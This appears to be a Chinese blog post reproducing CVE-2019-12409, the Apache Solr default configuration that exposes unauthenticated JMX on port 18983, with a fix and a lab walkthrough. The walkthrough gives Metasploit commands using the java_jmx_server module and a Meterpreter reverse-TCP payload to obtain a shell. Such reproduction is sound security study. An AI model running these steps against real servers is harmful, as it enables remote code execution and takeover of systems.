Apache Solr錯誤預設配置導致的RCE(CVE-2019-12409)

維梓梓發表於2020-11-22

宣告

好好學習,天天向上

漏洞描述

Apache Solr的8.1.1和8.2.0版本的自帶配置檔案solr.in.sh中存在不安全的選項ENABLE_REMOTE_JMX_OPTS=“true”。如果受害者使用了該預設配置,則會在預設埠18983開放JMX服務,且預設未開啟認證。任何可訪問此埠的攻擊者可利用此漏洞向受影響服務發起攻擊,執行任意程式碼。

​ 建議快速響應,將solr.in.sh配置檔案中的ENABLE_REMOTE_JMX_OPTS選項設定為false,然後重啟Solr服務。

影響範圍

Apache Solr8.1.1和8.2.0版本

復現過程

這裡使用8.2.0版本

下載地址

http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

下載後,放到kali,linux中,msf和solr都在kali中,我這裡省點事,相當於自己打自己了,kali的IP為192.168.239.139

解壓完成後進入該資料夾的bin目錄下

檢視solr.in.sh檔案發現ENABLE_REMOTE_JMX_OPTS="true"選項開啟

在bin目錄下執行命令

./solr  start  -force

在這裡插入圖片描述

一旦掃描發現開啟了18983

就可以開啟msf了

命令列啟動msf

msfconsole

設定目標資訊

use exploit/multi/misc/java_jmx_server
set RHOST 192.168.239.139
set RPORT 18983

設定攻擊載荷(反連shell)

set payload java/meterpreter/reverse_tcp
set LHOST 192.168.239.139
set LPORT  4444

在這裡插入圖片描述

設定完畢後可以開始攻擊,拿到shell

run

…(img-lrqKUpbp-1606037663158)]

設定完畢後可以開始攻擊,拿到shell

run

在這裡插入圖片描述

相關文章